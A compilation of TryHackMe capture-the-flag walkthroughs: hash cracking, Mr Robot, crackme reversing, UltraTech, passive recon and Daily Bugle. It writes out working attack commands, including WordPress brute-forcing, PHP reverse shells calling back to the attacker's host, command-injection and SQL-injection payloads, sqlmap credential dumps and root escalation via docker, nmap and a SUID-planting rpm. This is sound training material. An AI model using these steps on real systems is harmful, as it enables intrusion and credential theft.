Crack The Hash TryHackMe Write-ups | THM Walkthroughs | LabViet


Hash 1: bcrypt ($2y$ prefix, cost 12), hashcat mode 3200. bcrypt at cost 12 is slow, so the wordlist is first cut down to 4-character candidates:

$2y$12$Dwt1BZj6pcyc3Dy1FWZ5ieeUznr71EeNkJkUlypTsgbX1H68wsRom

Commands:

grep '^....$' /usr/share/wordlists/rockyou.txt > LabViet4.txt

hashcat -a 0 -m 3200 '$2y$12$Dwt1BZj6pcyc3Dy1FWZ5ieeUznr71EeNkJkUlypTsgbX1H68wsRom' LabViet4.txt

Hash 2: sha512crypt ($6$ prefix, salt aReallyHardSalt), hashcat mode 1800. Same trick, 6-character candidates only:

$6$aReallyHardSalt$6WKUTqzq.UQQmrm0p/T7MPpMbGNnzXPMAXi4bJMl9be.cfi3/qxIf.hsGpS41BqMhSrHVXgMpdjS6xeKZAs02.

Commands:

grep '^......$' /usr/share/wordlists/rockyou.txt > LabViet6.txt

hashcat -a 0 -m 1800 '$6$aReallyHardSalt$6WKUTqzq.UQQmrm0p/T7MPpMbGNnzXPMAXi4bJMl9be.cfi3/qxIf.hsGpS41BqMhSrHVXgMpdjS6xeKZAs02.' LabViet6.txt

Hash 3: given as hash:salt, where tryhackme is the salt. It is HMAC-SHA1 with the salt used as the HMAC key, which is hashcat mode 160 (mode 150 is HMAC-SHA1 with the password as the key; if 160 does not crack it, 150 is the other candidate). No length is known, so the full rockyou is used:

e5d8870e5bdd26602cab8dbe07a942c8669e56d6:tryhackme

hashcat -a 0 -m 160 'e5d8870e5bdd26602cab8dbe07a942c8669e56d6:tryhackme' /usr/share/wordlists/rockyou.txt
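As an added example (not part of the original write-up), here is what the three hashcat commands above do, reproduced in plain Python: a small prefix-to-mode lookup, the grep-style length filter, and the salted HMAC-SHA1 check for the last hash, with the mode 160 versus mode 150 key order made explicit. The wordlist and the target digest are constructed inside the script; rockyou.txt and the room's real hash are not embedded.

```python
"""Added example (not from the original write-up): the hashcat commands
above, reproduced in plain Python for the salted HMAC-SHA1 case.

Assumptions: the wordlist and the target digest are constructed here for
the demo; rockyou.txt and the room's real hash are not embedded.
"""
import hashlib
import hmac

# Prefix -> hashcat mode, for the hash formats that appear in this write-up.
HASHCAT_MODES = {
    "$2y$": 3200,   # bcrypt
    "$6$": 1800,    # sha512crypt
}


def identify_mode(h):
    """Return the hashcat mode for a hash string, or None if unknown.

    A 40-hex-digit value followed by ':salt' is assumed to be HMAC-SHA1
    keyed with the salt (mode 160), which is what the room's last hash is.
    """
    for prefix, mode in HASHCAT_MODES.items():
        if h.startswith(prefix):
            return mode
    digest, sep, _salt = h.partition(":")
    if sep and len(digest) == 40 and all(c in "0123456789abcdef" for c in digest):
        return 160
    return None


def filter_by_length(words, n):
    """Equivalent of grep '^....$': keep only the n-character candidates."""
    return [w for w in words if len(w) == n]


def hmac_sha1_hex(key, msg):
    return hmac.new(key.encode(), msg.encode(), hashlib.sha1).hexdigest()


def crack_hmac_sha1(target_hex, salt, words, key_is_salt=True):
    """Try each candidate. key_is_salt=True is hashcat mode 160
    (HMAC key = salt); False is mode 150 (HMAC key = password)."""
    for w in words:
        digest = hmac_sha1_hex(salt, w) if key_is_salt else hmac_sha1_hex(w, salt)
        if hmac.compare_digest(digest, target_hex):
            return w
    return None


if __name__ == "__main__":
    # Constructed demo wordlist; "4816" plays the role of the unknown password.
    words = ["abcd", "1234", "4816", "password", "zz"]
    target = hmac_sha1_hex("tryhackme", "4816")  # constructed mode-160-style target
    print(identify_mode("$2y$12$Dwt1BZj6pcyc3Dy1FWZ5ieeUznr71EeNkJkUlypTsgbX1H68wsRom"))
    print(crack_hmac_sha1(target, "tryhackme", filter_by_length(words, 4)))
```

The key order matters: the same wordlist run with key_is_salt=False (mode 150) does not find the password, which is exactly the difference between the two hashcat modes.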

-------------

**https://tryhackme.com/room/mrrobot**
**Copyright @ http://bloggeroffer.blogspot.com**

**Task 1**
S1.1
nmap -sC -sV -O [ip-address] -oN basic_scan.nmap

S1.2
nikto -h [ip-address]

or

gobuster dir -u http://[ip-address] -w /usr/share/wordlists/dirb/common.txt -o directories.txt

S1.3
With Firefox, open http://[ip-address]/robots.txt (it lists the two files below) AND http://[ip-address]/key-1-of-3.txt -> Key 1
Or with Linux: curl -s http://[ip-address]/robots.txt AND curl -s http://[ip-address]/key-1-of-3.txt -> Key 1
http://[ip-address]/fsocity.dic -> a wordlist; guess that it holds usernames and passwords

Task 2
Method 1: 
curl -s http://[ip-address]/license | tr -d "\n"
then decode the base64 string found in the file:
echo "ZWxsaW90OkVSMjgtMDY1Mgo=" | base64 -d
which gives elliot:ER28-0652 (username:password); or decode on https://www.base64decode.org/

Method 2
S2.1: List directories
gobuster dir -u http://[ip-address] -w /usr/share/dirbuster/directory-list-2.3-medium.txt -e

S2.2: Get the file we guess holds usernames and passwords
wget http://[ip-address]/fsocity.dic
fsocity.dic has many repeated lines; fsocity.dic.uniq used below is the same list with duplicates removed (sort -u), which cuts the brute force down a lot.

S2.3: Guess the username of the WordPress login. The string after the last colon is hydra's failure condition: WordPress answers "Invalid username" for unknown users, so any response without it reveals a valid username.
hydra -L fsocity.dic.uniq -p nopass \
-s 80 [ip-address] http-post-form -t 30 \
'/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In:Invalid username'

S2.4: Guess the password of the WordPress login. Here the failure string is the wrong-password message, so this only works once the username is known: with an unknown username every response lacks this string and hydra reports false hits.
hydra -l Elliot -P fsocity.dic.uniq \
-s 80 [ip-address] http-post-form -t 30 \
'/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In:The password you entered for the username'

Both S2.3 and S2.4 can be done with wpscan (wpscan 3.x option names):
wpscan --url http://[ip-address]/ --usernames users.txt --passwords pw.txt
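As an added example (not part of the original write-up), the response-string oracle that the two hydra commands above rely on, shown end to end against a tiny local stand-in for wp-login.php. The login handler is a constructed simplification of WordPress (real WordPress also sets cookies and redirects on success), and the user elliot with password ER28-0652 is constructed test data matching the license file above.

```python
"""Added example (not from the original write-up): the response-string
oracle behind the hydra http-post-form commands, against a local fake
wp-login.php.

Assumptions: the handler below is a constructed simplification of
WordPress; 'elliot' / 'ER28-0652' is constructed test data.
"""
import threading
import urllib.parse
import urllib.request
from http.server import BaseHTTPRequestHandler, HTTPServer

# Constructed credentials for the fake site (WordPress usernames are
# case-insensitive, so compare lowercased).
VALID_USERS = {"elliot": "ER28-0652"}

# The two failure strings hydra matches on in the write-up.
BAD_USER = "Invalid username"
BAD_PASS = "The password you entered for the username"


class FakeWPLogin(BaseHTTPRequestHandler):
    """Minimal wp-login.php: its error text leaks whether the user exists."""

    def do_POST(self):
        length = int(self.headers.get("Content-Length", 0))
        form = urllib.parse.parse_qs(self.rfile.read(length).decode())
        user = form.get("log", [""])[0]
        pwd = form.get("pwd", [""])[0]
        if user.lower() not in VALID_USERS:
            body = f"<strong>ERROR</strong>: {BAD_USER}."
        elif VALID_USERS[user.lower()] != pwd:
            body = f"<strong>ERROR</strong>: {BAD_PASS} <strong>{user}</strong> is incorrect."
        else:
            body = "<h1>Dashboard</h1>"  # simplified success page
        data = body.encode()
        self.send_response(200)
        self.send_header("Content-Type", "text/html")
        self.send_header("Content-Length", str(len(data)))
        self.end_headers()
        self.wfile.write(data)

    def log_message(self, *args):  # keep the demo quiet
        pass


def start_server():
    """Start the fake wp-login.php on a free loopback port."""
    srv = HTTPServer(("127.0.0.1", 0), FakeWPLogin)
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv


def attempt(url, user, pwd):
    """One login POST with the same fields hydra's http-post-form sends."""
    data = urllib.parse.urlencode({"log": user, "pwd": pwd, "wp-submit": "Log In"}).encode()
    req = urllib.request.Request(url, data=data, method="POST")
    with urllib.request.urlopen(req) as r:
        return r.read().decode()


def enumerate_users(url, candidates):
    """hydra -L list -p nopass ... :Invalid username
    A response without the failure string means the username exists."""
    return [u for u in candidates if BAD_USER not in attempt(url, u, "nopass")]


def guess_password(url, user, candidates):
    """hydra -l user -P list ... :The password you entered for the username
    Only meaningful for a username known to exist: for an unknown user every
    response lacks this string, so the very first candidate looks like a hit."""
    for p in candidates:
        if BAD_PASS not in attempt(url, user, p):
            return p
    return None


if __name__ == "__main__":
    srv = start_server()
    url = f"http://127.0.0.1:{srv.server_port}/wp-login.php"
    users = enumerate_users(url, ["admin", "Elliot", "mrrobot"])
    print(users, guess_password(url, users[0], ["password", "ER28-0652"]))
    srv.shutdown()
```

Running it against the fake server returns only Elliot from the username list and ER28-0652 from the password list; running guess_password against a name that does not exist returns the first candidate, which is the false positive the S2.4 caveat refers to.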

S2.5 Upload a reverse shell via the theme's 404.php (theme editor in wp-admin)
Download the PHP reverse shell: https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php
Change $ip= (and $port=, to match the listener below) in that PHP file. Note: $ip is your attacking machine's address, where the shell calls back, not [ip-address]. Paste the file's contents over 404.php and save.

S2.6 Use Netcat to open a listener
nc -nlvp 1234

S2.7 Open the reverse shell
http://[ip-address]/404.php

S2.8 Get robot's password
ls -l /home/robot/
cat /home/robot/password.raw-md5
The file holds robot's password as a raw MD5 hash; look it up on https://md5.gromweb.com/?md5=c3fcd3d76192e4007dfb496cca67e13b or https://crackstation.net/ (it is the alphabet, a to z).

S2.9 su robot
"su: must be run from a terminal" is fixed by spawning a pty first:
python -c 'import pty; pty.spawn("/bin/sh")'
After that command, su robot works (password from S2.8), then
cat /home/robot/key-2-of-3.txt

Task 3
S3.1 sudo -l
(robot's password: a->z)
Result: "Sorry, user robot may not run sudo on linux." so sudo is no use here.
First, find all SUID binaries owned by root:
find / -user root -perm -4000 -print 2>/dev/null

Second, nmap is in that list, i.e. it runs as root; confirm with:
ls -l /usr/local/bin/nmap

Finally, this nmap version still supports interactive mode (removed in modern releases), and ! runs shell commands, here as root:
nmap --interactive

!whoami
!ls /root
!cat /root/key-3-of-3.txt

https://tryhackme.com/room/reverselfiles
Task 1
file crackme1
chmod +x crackme1
./crackme1

Task 2
strings crackme2
./crackme2 super_secret_password

Task 3
strings crackme3
or
r2 -A crackme3
The password is stored base64-encoded; decode the string found (HashHere):
echo HashHere | base64 -d

Task 4
Method 1
r2 -A crackme4 pass
px @ rax

Method 2
strings crackme4

Use radare2
r2 -d ./crackme4 password

aa
afl | grep main
pdf @main
pdf @sym.compare_pwd
db 0x0040006cf
dc
px @ rbp-0x20

Task 5
strings crackme5
Method 1
r2 -A crackme5 
px @ rdx

Method 2
r2 -d ./crackme5 

pdf @main
pdf @sym.compare_pwd
db 0x004000829
db 0x004000834
dc
px @ rbp-0x30
px @ rbp-0x50

./crackme5
OfdlDSA|3tXb32~X3tX@sX`4tXtz

Task 6
chmod +x crackme6
Use Ghidra https://ghidra-sre.org/ as a Decompiler

Go to the main function; it calls compare_pwd.

Looking at compare_pwd, decompile my_secure_test, which checks the input against fixed characters.

Reading those characters as hex we get 313333375f707764
Visit https://toolbox.googleapps.com/apps/encode_decode/

Then choose Hex Decode, which gives 1337_pwd

Task 7
Run Ghidra and look at the main function: the input is compared with local_14 == 0x7a69. Converting this hex to decimal (e.g. with https://www.convzone.com/hex-to-decimal/) gives 31337.
./crackme7 31337

Task 8
Run Ghidra and look at the main function: iVar2 == -0x35010ff3. Converting this hex to decimal gives -889262067. The constant shows as negative because the comparison is against a signed 32-bit int; the same bit pattern is 0xcafef00d.
./crackme8 -889262067
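As an added example (not part of the original write-up), the conversions behind Tasks 6 to 8 in plain Python, so the online hex converters are not needed: hex bytes to text, a Ghidra-style literal to decimal, and the signed/unsigned 32-bit view of the same constant. The input values are the constants the write-up reads out of Ghidra.

```python
"""Added example (not from the original write-up): the conversions used in
Tasks 6-8, with the constants the write-up reads out of Ghidra.
"""
import struct


def hex_to_ascii(hex_digits):
    """Task 6: the bytes a decompiler shows as a hex constant, as text."""
    return bytes.fromhex(hex_digits).decode("ascii")


def literal_to_int(lit):
    """Tasks 7/8: a C-style literal as Ghidra prints it ('0x7a69',
    '-0x35010ff3') to the decimal the program's input must match."""
    return int(lit, 16)


def as_signed32(pattern):
    """Read a 32-bit pattern as a C 'int' (two's complement).
    Ghidra prints the constant negative because the compare is against a
    signed int; 0xcafef00d and -889262067 are the same 32 bits."""
    return struct.unpack("<i", struct.pack("<I", pattern & 0xFFFFFFFF))[0]


def as_unsigned32(value):
    """Inverse of as_signed32: the hex form of a (possibly negative) int."""
    return f"0x{value & 0xFFFFFFFF:08x}"


def decompiler_constant_report(lit):
    """Summarise one decompiler constant in every form worth trying as input."""
    n = literal_to_int(lit)
    return {"decimal": n, "hex32": as_unsigned32(n), "signed32": as_signed32(n)}


if __name__ == "__main__":
    print(hex_to_ascii("313333375f707764"))          # Task 6
    print(decompiler_constant_report("0x7a69"))       # Task 7
    print(decompiler_constant_report("-0x35010ff3"))  # Task 8
```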

UltraTech

nmap -sC -sV -p- 10.10.64.13

gobuster dir --url http://10.10.64.13 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 32

gobuster dir --url http://10.10.64.13:8081/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 32


gobuster dir --url http://10.10.64.13:31331/ -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -t 32

The ping endpoint hands the ip parameter to a shell, so backtick command substitution runs arbitrary commands on the server and the output comes back in the response (single quotes would not be executed):
http://10.10.64.13:8081/ping?ip=`cat utech.db.sqlite`

--or, URL-encoded for curl:
curl -i 'http://10.10.64.13:8081/ping?ip=%60cat%20utech.db.sqlite%60'
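As an added example (not part of the original write-up, and not the UltraTech API's own code), why the ping?ip= parameter above executes a command, next to the fix. Both handlers are constructed stand-ins, and echo replaces ping so the demo runs offline; the payload is a harmless backtick stand-in for `cat utech.db.sqlite`.

```python
"""Added example (not from the original write-up): a constructed vulnerable
ping handler next to a hardened one. 'echo' replaces 'ping' so the demo
runs offline; the payload is a harmless stand-in for the real one.
"""
import ipaddress
import subprocess


def ping_vulnerable(ip, binary="ping"):
    """String-built command run through a shell: backticks, ;, | and && in
    'ip' are interpreted by sh, exactly as with /ping?ip=`cat utech.db.sqlite`."""
    proc = subprocess.run(f"{binary} -c 1 {ip}", shell=True,
                          capture_output=True, text=True)
    return proc.stdout


def ping_hardened(ip, binary="ping"):
    """Validate that the parameter is a literal IP address, then pass it as
    one argv element with no shell involved. Anything that is not an IP
    (including the injection payload) is rejected before any process runs."""
    try:
        addr = ipaddress.ip_address(ip.strip())
    except ValueError:
        raise ValueError(f"refusing to ping non-IP parameter: {ip!r}") from None
    proc = subprocess.run([binary, "-c", "1", str(addr)], shell=False,
                          capture_output=True, text=True)
    return proc.stdout


# Constructed, harmless stand-in for `cat utech.db.sqlite`.
PAYLOAD = "`echo INJECTED`"

if __name__ == "__main__":
    print(ping_vulnerable(PAYLOAD, binary="echo"))   # the backticks are executed
    try:
        ping_hardened(PAYLOAD, binary="echo")
    except ValueError as e:
        print(e)
    print(ping_hardened("127.0.0.1", binary="echo"))
```

The argv form alone already stops the shell from interpreting the backticks; the ipaddress check on top of it is what keeps a hostname-looking payload from being passed to ping as an unexpected option or target.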

The dumped database row holds an MD5 password hash; look it up on crackstation.net: f357a0c52799563c7c7b76c1e7543a32
--or
hashcat -a 0 -m 0 f357a0c52799563c7c7b76c1e7543a32 /usr/share/wordlists/rockyou.txt --quiet

ssh r00t@10.10.131.120 (the machine's IP changed between sessions; log in with the cracked password)

id
The output shows r00t is in the docker group, which is effectively root: mount the host's / into a container and chroot into it
docker images
docker run -v /:/mnt --rm -it bash chroot /mnt bash

whoami
ls -la /root

https://tryhackme.com/room/passiverecon
Task 2  Passive Versus Active Recon

1.Q

You visit the Facebook page of the target company, hoping to get some of their employee names. What kind of reconnaissance activity is this? (A for active, P for passive)

Ans: P

2.Q

You ping the IP address of the company webserver to check if ICMP traffic is blocked. What kind of reconnaissance activity is this? (A for active, P for passive)

Ans: A

3.Q

You happen to meet the IT administrator of the target company at a party. You try to use social engineering to get more information about their systems and network infrastructure. What kind of reconnaissance activity is this? (A for active, P for passive)

Ans: A

*Task 3  Whois

1.Q

When was TryHackMe.com registered?

Ans:  20180705

2.Q

What is the registrar of TryHackMe.com?

Ans: namecheap.com

3.Q

Which company is TryHackMe.com using for name servers?

Ans: cloudflare.com

*Task 4  nslookup and dig

1.Q

Check the TXT records of thmlabs.com. What is the flag there?
nslookup -type=TXT thmlabs.com

Ans: THM{a5b83929888ed36acb0272971e43****}

*Task 5  DNSDumpster

Lookup tryhackme.com on DNSDumpster. What is one interesting subdomain that you would discover in addition to www and blog?

Ans: remote

*Task 6  Shodan.io

1.Q

According to Shodan.io, what is the 2nd country in the world in terms of the number of publicly accessible Apache servers?
Search query: Apache
Ans: Germany

2.Q

Based on Shodan.io, what is the 3rd most common port used for Apache?
Search query: Apache
Ans:  8080

3.Q

Based on Shodan.io, what is the 3rd most common port used for nginx?
Search query: nginx
Ans: 5051

https://tryhackme.com/room/dailybugle
nmap -sV -sC IP-address

Detect the Joomla version from the manifest:
http://IP-address/administrator/manifests/files/joomla.xml

Joomla 3.7.0 has an unauthenticated SQL injection in com_fields (CVE-2017-8917); grab the Exploit-DB entry:
searchsploit joomla 3.7.0
searchsploit -m php/webapps/42033.txt

Confirm the injection with a time-based payload (the response should take about 5 seconds):
http://IP-address/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=(SELECT * FROM (SELECT(SLEEP(5)))GDiu)

sqlmap -u "http://IP-address/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering]

Dump usernames and password hashes:
sqlmap -u "http://IP-address/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D joomla -T "#__users" -C username,password -p list[fullordering] --dump

--Save the hash to a file
sudo nano VietKim.txt

Crack the hash (Joomla stores bcrypt; john detects the format itself)
john --wordlist=/usr/share/wordlists/rockyou.txt VietKim.txt

Login at http://IP-address/administrator/index.php with the above username and password

Click Extensions -> Templates -> Templates
Select the Protostar template (the one in use)
Open index.php

Download a reverse shell:
https://raw.githubusercontent.com/jbarcia/Web-Shells/master/laudanum/php/php-reverse-shell.php

Paste the content of the PHP reverse shell at the beginning of index.php (change the reverse IP to your machine and the port to 443) and save. Then start a listener and load the site's front page to trigger it:

sudo nc -lvnp 443

Once the shell connects, upgrade it to a proper tty:
python -c 'import pty; pty.spawn("/bin/sh")'
then Ctrl-Z, and on your own terminal:
stty raw -echo
fg

The Joomla config holds the database password, which jjameson reuses:
cd /var/www/html
cat configuration.php

su jjameson
whoami
sudo -l
(shows jjameson may run yum as root; the GTFOBins yum entry applies: build an rpm with fpm whose before-install script runs as root during yum localinstall)

Test first with a package whose script just runs id. On the attacking machine:
TF=$(mktemp -d)
echo 'id' > $TF/x.sh
fpm -n x -s dir -t rpm -a all --before-install $TF/x.sh $TF
ls -la x-1.0-1.noarch.rpm
sudo python -m http.server 80

On the target:
wget http://IP-Reverse/x-1.0-1.noarch.rpm
sudo yum localinstall -y x-1.0-1.noarch.rpm

Now the real payload: a SUID copy of bash. On the attacking machine:
TF=$(mktemp -d)
echo 'cp /bin/bash /tmp/stef && chmod +s /tmp/stef' > $TF/x.sh
fpm -n a -s dir -t rpm -a all --before-install $TF/x.sh $TF
ls -la a-1.0-1.noarch.rpm
sudo python -m http.server 80

On the target:
wget http://IP-Reverse/a-1.0-1.noarch.rpm
sudo yum localinstall -y a-1.0-1.noarch.rpm
ls -la /tmp/stef
/tmp/stef -p
whoami

